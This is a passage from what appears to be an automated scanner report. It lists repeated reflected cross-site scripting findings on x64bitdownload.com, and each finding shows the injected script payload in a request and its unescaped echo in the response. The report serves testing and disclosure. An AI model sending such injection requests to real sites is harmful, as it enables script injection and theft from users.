Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html" />
...[SNIP]...

4.1829. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a650"><script>alert(1)</script>4eac85a3ec4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/2a650"><script>alert(1)</script>4eac85a3ec4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/2a650"><script>alert(1)</script>4eac85a3ec4" />
...[SNIP]...

4.1830. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f05"><script>alert(1)</script>fc2166241bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

4.1831. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b00c"><script>alert(1)</script>9b9d0e5a949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949" />
...[SNIP]...

4.1832. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be78"><script>alert(1)</script>474c7483424 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html" />
...[SNIP]...

4.1833. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38eaf"><script>alert(1)</script>7f5c302d424 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/38eaf"><script>alert(1)</script>7f5c302d424 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/38eaf"><script>alert(1)</script>7f5c302d424" />
...[SNIP]...

4.1834. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38c6"><script>alert(1)</script>235a4421e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

4.1835. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a72"><script>alert(1)</script>406b3b0c339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/71a72"><script>alert(1)</script>406b3b0c339 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/71a72"><script>alert(1)</script>406b3b0c339" />
...[SNIP]...

4.1836. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d9b"><script>alert(1)</script>2df60bcd894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html" />
...[SNIP]...

4.1837. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d23"><script>alert(1)</script>db205ea7bef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e7d23"><script>alert(1)</script>db205ea7bef HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/e7d23"><script>alert(1)</script>db205ea7bef" />
...[SNIP]...

4.1838. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da589"><script>alert(1)</script>1e658102b94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

4.1839. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae28f"><script>alert(1)</script>c6d61f2298f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/ae28f"><script>alert(1)</script>c6d61f2298f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/ae28f"><script>alert(1)</script>c6d61f2298f" />
...[SNIP]...

4.1840. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e7"><script>alert(1)</script>f2581632af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

4.1841. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f2b"><script>alert(1)</script>da38c854bdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e4f2b"><script>alert(1)</script>da38c854bdf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/e4f2b"><script>alert(1)</script>da38c854bdf" />
...[SNIP]...

4.1842. http://www.x64bitdownload.com/software-advanced.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1990"><script>alert(1)</script>2069cb8ec45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.htmlb1990"><script>alert(1)</script>2069cb8ec45" />
...[SNIP]...

4.1843. http://www.x64bitdownload.com/software-advanced.html [category_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the category_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9983e"><script>alert(1)</script>7a9a68e5cfe was submitted in the category_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:25:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=39983e"><script>alert(1)</script>7a9a68e5cfe&s=d" />
...[SNIP]...

4.1844. http://www.x64bitdownload.com/software-advanced.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90432"><script>alert(1)</script>6a90f02313b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?90432"><script>alert(1)</script>6a90f02313b=1" />
...[SNIP]...

4.1845. http://www.x64bitdownload.com/software-advanced.html [s parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c3de"><script>alert(1)</script>2b0419dd3c8 was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44&category_id=3&s=d5c3de"><script>alert(1)</script>2b0419dd3c8" />
...[SNIP]...

4.1846. http://www.x64bitdownload.com/software-advanced.html [subcategory_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The value of the subcategory_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f24a6"><script>alert(1)</script>bc5aeab94eb was submitted in the subcategory_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:24:34 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/software-advanced.html?subcategory_id=44f24a6"><script>alert(1)</script>bc5aeab94eb&category_id=3&s=d" />
...[SNIP]...

4.1847. http://www.x64bitdownload.com/submit-pad-file.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
